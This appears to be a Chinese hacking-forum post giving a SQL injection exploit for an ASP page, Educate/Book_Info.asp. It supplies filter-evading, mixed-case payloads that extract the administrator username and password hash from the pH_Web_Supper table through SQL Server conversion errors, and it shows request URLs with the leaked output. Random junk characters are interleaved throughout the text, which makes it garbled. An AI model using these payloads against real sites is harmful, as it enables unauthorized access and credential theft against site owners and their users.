漏洞出现在Educate/Book_Info.asp
- l( B1 Q1 T# C1 I0 D9 L
6 K h* x9 \& ~4 W1 o此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出' Q1 j! Y7 v4 ]/ E8 O
& ^/ n8 N& N, r$ l& e5 I2 Nexp:如下! n# _" f! I# e( _
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)% `1 e; w1 M- |. k
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 E9 F* J: F8 d; K v, s
6 T% K8 S" I$ }7 s+ j5 z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, z5 n" [6 P* k+ X/ |- i 6 k) U7 a% i# O" W
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
: G9 Q# @, [# V , k# i& s# H/ N
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。: J, ^' I; M( S) j" r% N
# Z9 {2 g/ D& a: [& @9 x2 i/Educate/Book_Info.asp,行 8- R) n, p! [6 n5 y6 W3 Q
+ ^" r) K- c5 X9 c2 H1 g jhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% F7 K+ B$ e* c+ z: p( q( @ & g% A0 E" n) }' J
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
2 W6 b2 m( j/ M& r# V9 N3 Y
) \$ c! r' b' D( `1 P4 r7 e将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ j: X+ s) D: V/ R, L3 E( M Q
; B% T3 f; ^2 ]2 T3 g
/Educate/Book_Info.asp,行 8
) ? `0 [# A" @; `, _ |